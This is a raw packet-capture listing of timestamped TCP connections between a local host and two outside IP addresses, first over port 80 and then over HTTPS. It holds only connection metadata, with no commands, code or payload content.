                                                    Dec 12, 2024 17:33:57.767880917 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.767903090 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768058062 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768070936 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768080950 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768090963 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768129110 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768138885 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768141985 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.768141985 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.768315077 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.768614054 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768626928 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768636942 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768646955 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768807888 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768817902 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768821955 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.768835068 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768858910 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768868923 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.768878937 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769067049 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.769067049 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.769084930 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769093037 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769099951 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769107103 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769114971 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769121885 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769238949 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769329071 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769335985 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.769335985 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.769346952 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769355059 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769517899 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.769542933 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769551992 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769560099 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769567013 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769573927 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769606113 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769613028 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769619942 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769628048 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769635916 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769684076 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.769710064 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769718885 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769726992 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769747019 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769803047 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769810915 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769818068 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769825935 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769843102 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.769843102 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.769843102 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.769843102 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.769860029 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769866943 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769874096 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.769984007 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770015001 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770015001 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770015001 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770015001 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770039082 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770045996 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770184994 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770306110 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770350933 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770360947 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770368099 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770375013 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770382881 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770411015 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770417929 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770425081 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770432949 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770440102 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770462036 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770469904 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770477057 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770483971 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770512104 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770519972 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770523071 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770531893 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770539045 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770546913 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770561934 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770569086 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770576000 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770584106 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770616055 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770622969 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770695925 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770695925 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770695925 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770695925 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770695925 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770695925 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770744085 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770797968 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770806074 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.770864964 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.770864964 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.771034956 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.771034956 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.771034956 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.984683990 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.984694004 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.984705925 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.984719038 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.984730959 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.984787941 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.984988928 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.984988928 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.985017061 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985030890 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985045910 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985055923 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985063076 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985070944 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985078096 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985085011 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985093117 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985100985 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985109091 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985332012 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.985332012 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.985332012 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.985332012 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.985456944 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985465050 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985472918 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985491037 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985503912 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985517979 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985531092 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985543966 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985646963 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.985744953 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985753059 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985759974 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985768080 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985774994 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985783100 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985790968 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985797882 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985805988 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985812902 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.985816002 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986012936 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986037016 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986052036 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986066103 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986078978 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986092091 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986105919 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986119986 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986133099 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986146927 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986157894 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986157894 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986170053 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986183882 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986197948 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986206055 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986206055 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986226082 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986299992 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986314058 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986327887 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986377954 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986377954 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986377954 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986573935 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986593962 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986602068 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986609936 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986617088 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986624956 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986633062 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986640930 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986648083 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986655951 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986663103 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986670017 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986676931 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986684084 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986691952 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986699104 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986706018 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986713886 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986716986 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986726999 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986733913 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986742020 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986748934 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986756086 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986763000 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986840963 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986849070 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986856937 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.986917973 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986917973 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986917973 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986917973 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986917973 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986917973 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986933947 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986933947 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.986933947 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.987095118 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987102985 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987106085 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.987114906 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987123013 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987129927 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987137079 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987144947 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987152100 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987159014 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987165928 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987173080 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987179995 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987188101 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987195015 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.987278938 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.987278938 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.987278938 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.987278938 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.987323999 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.987323999 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.987495899 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:58.032432079 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:58.751889944 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:58.917262077 CET49711443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:33:58.917283058 CET44349711172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:33:58.917431116 CET49711443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:33:58.919759035 CET49711443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:33:58.919765949 CET44349711172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:33:59.162168026 CET44349711172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:33:59.162444115 CET49711443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:33:59.165085077 CET49711443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:33:59.165092945 CET44349711172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:33:59.165282011 CET44349711172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:33:59.198744059 CET49711443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:33:59.198744059 CET49711443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:33:59.198820114 CET44349711172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.033301115 CET44349711172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.033416986 CET44349711172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.033890963 CET49711443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.036251068 CET49711443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.036268950 CET44349711172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.036302090 CET49711443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.036309004 CET44349711172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.113126040 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.113152027 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.113336086 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.113568068 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.113578081 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.352109909 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.352277994 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.353214025 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.353245974 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.353523970 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.354578972 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.354578972 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.354650974 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.936943054 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.937012911 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.937050104 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.937084913 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.937150002 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.937169075 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.937179089 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.937264919 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.937427998 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.937562943 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.937613964 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.937650919 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.937738895 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.937747002 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.937868118 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.937912941 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.938379049 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.938420057 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.938467979 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.938550949 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.938677073 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.938743114 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.938743114 CET49712443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.938754082 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.938757896 CET44349712172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.960088968 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.960122108 CET44349713172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:00.960272074 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.960597992 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:00.960607052 CET44349713172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:01.197833061 CET44349713172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:01.198117018 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.199017048 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.199027061 CET44349713172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:01.199274063 CET44349713172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:01.201020956 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.201309919 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.201358080 CET44349713172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:01.201375008 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.201385975 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.201441050 CET44349713172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:01.201602936 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.201796055 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.201831102 CET44349713172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:01.799530983 CET44349713172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:01.799623966 CET44349713172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:01.799793005 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.799916029 CET49713443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.799927950 CET44349713172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:01.812860012 CET49714443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.812880993 CET44349714172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:01.813038111 CET49714443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.813237906 CET49714443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:01.813244104 CET44349714172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:02.050777912 CET44349714172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:02.050942898 CET49714443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:02.051881075 CET49714443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:02.051896095 CET44349714172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:02.052222967 CET44349714172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:02.053304911 CET49714443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:02.053457022 CET49714443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:02.053482056 CET49714443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:02.053499937 CET44349714172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:02.053555012 CET49714443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:02.053565025 CET44349714172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:02.947650909 CET44349714172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:02.947993040 CET44349714172.67.207.38192.168.11.20
